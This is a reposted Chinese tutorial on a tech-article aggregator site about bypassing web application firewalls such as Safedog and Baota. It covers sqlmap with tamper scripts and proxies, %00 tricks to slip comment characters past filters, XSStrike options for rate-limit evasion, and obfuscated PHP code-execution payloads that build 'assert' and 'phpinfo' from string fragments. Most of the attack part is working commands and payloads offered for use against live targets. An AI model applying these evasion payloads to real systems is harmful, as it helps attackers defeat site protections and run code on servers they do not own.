IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> WAF绕过-漏洞利用之注入上传跨站等绕过 -> 正文阅读

[PHP知识库]WAF绕过-漏洞利用之注入上传跨站等绕过

在这里插入图片描述
waf主要拦截的就是上图漏洞

SQL 注入
如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块
安全狗:参考之前 payload
Aliyun:基本修改指纹即可
宝塔:匹配关键字外加/*等
sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent

文件上传
1.php 截断 参考前面上传 waf 绕过 payload

XSS 跨站
利用 XSStrike 绕过 加上--timeout 或--proxy 绕过 cc

其他集合
RCE:
加密加码绕过?算法可逆?关键字绕过?提交方法?各种测试!
txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4

文件包含:没什么好说的就这几种
..\ ..../ ..\.\

一、sqlmap绕过

1.通过sqlmap对网址进行测试的时候,如果对方有cc流量防护,需要给sqlmap设置一个代理进行注入。

2.如果对方有安全狗等waf,可以使用tamper自定义模块通过自己编写绕过语法,注入时对waf进行绕过。

3.当对方有waf时,需要设置更换sqlmap的user-agent,否则会被waf识别并拦截。

sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent

有宝塔时:

同样用编写后绕过安全狗的tampe模块去跑网站,虽然绕过了安全狗,如果对方有宝塔,会被宝塔拦截。
因为宝塔这个鸟毛过滤了/*等一系列字符。(宝塔比安全狗多了一个对/*进行检测)

绕过方法:

一但用到/*这些注释什么的,就在前面加上%00,宝塔就以为结束了,不会检测后面的数据了。

举例:

此时加上%00,宝塔没有进行拦截
在这里插入图片描述去掉%00后,宝塔检测到后面的/*,对请求进行拦截
在这里插入图片描述

二、 文件上传绕过waf

更改上传后缀名的格式(很多方法,具体在文件上传的笔记,这里就不多说了)
在这里插入图片描述

三、XSS绕过waf

利用 XSStrike工具进行测试
此时如果对方网站开启cc防护:
1.由于是工具,需要设置一个代理
2.设置延迟参数

XSStrike参数:

-h, --help //显示帮助信息
-u, --url //指定目标 URL
--data //POST 方式提交内容
-v, --verbose //详细输出
-f, --file //加载自定义 paload 字典
-t, --threads //定义线程数
-l, --level //爬行深度
-t, --encode //定义 payload 编码方式
--json //将 POST 数据视为 JSON
--path //测试 URL 路径组件
--seeds //从文件中测试、抓取 URL
--fuzzer //测试过滤器和 Web 应用程序防火墙。
--update //更新
--timeout //设置超时时间
--params //指定参数
--crawl //爬行
--proxy //使用代理
--blind //盲测试
--skip //跳过确认提示
--skip-dom //跳过 DOM 扫描
--headers //提供 HTTP 标头
-d, --delay //设置延迟

四、RCE绕过waf

RCE代码:
接收post传入的参数,并且通过eval执行,如果没执行成功则输出字符串
在这里插入图片描述

当对方网站上存在RCE漏洞,但是开启了安全狗和宝塔时:

1.输入echo 123; 并执行,成功输出
在这里插入图片描述
2.但是当输入phpinfo();时,连接被重置了,此处是因为敏感字符被waf检测到了所以进行拦截
在这里插入图片描述
在这里插入图片描述
3.打开宝塔的日志,发现是被宝塔拦截了,因为post传入的参数被检测出来触发了它的过滤规则
在这里插入图片描述
4.此时我们想到通过base64加密解密来绕过phpinfo(); 这个关键字

先把phpinfo();用base64加密,结果为cGhwaW5mbygpOw==,然后用php中的base64解密函数base64_decode()进行解密

所以在输入框内base64_decode(‘cGhwaW5mbygpOw==’);提交即可

当post将字符串base64_decode(‘cGhwaW5mbygpOw==’);提交后,对方后台接收到post值,并通过eval将字符串当成php代码执行,就成功对加密后的phpinfo();进行了解密还原。(此时感觉逻辑非常的通顺)

在这里插入图片描述

5.提交后发现又被拦截了,此时我们打开宝塔的日志看了一眼,又被匹配到了敏感参数,这次是base64_decode()(我感觉就算没有拦截的话,通过上面源码看,传入后也执行不了,会报语法错误)
在这里插入图片描述
6.此时就可以用字符串的拼接来绕过waf对关键字的匹配

(1) 因为waf只是拦截关键字,我们用字符串将关键字拼接起来,waf就不会识别到,并且可以执行同样的功能

例子:
$a='php'.'info();';assert($a);
将php和info(); 拼接起来赋值给变量a,再通过assert对执行变量a

在这里插入图片描述
提交后
在这里插入图片描述
-------------------------------------------------------------------分割线----------------------------------------------------------------------

(2) 或者用php中的str_replace函数替换变量中指定的字符串为空

$y=str_replace('x','','pxhpxinxfo()');assert($y);
在这里插入图片描述
提交后
在这里插入图片描述
-------------------------------------------------------------------分割线----------------------------------------------------------------------

(3) 上面的方法都有用到assert来执行phpinfo(); 如果assert也被过滤了呢
此时我们也可以用拼接字符串或者str_replace拆分来绕过关键字

$x='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','','pxhpxinxfo()');$xxx($y);

在这里插入图片描述
-------------------------------------------------------------------分割线----------------------------------------------------------------------

也可以通过$_REQUEST提交方式绕过
在这里插入图片描述
总之方法又很多,值得去思考!

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-24 15:04:36  更:2022-02-24 15:05:19 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 10:34:35-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码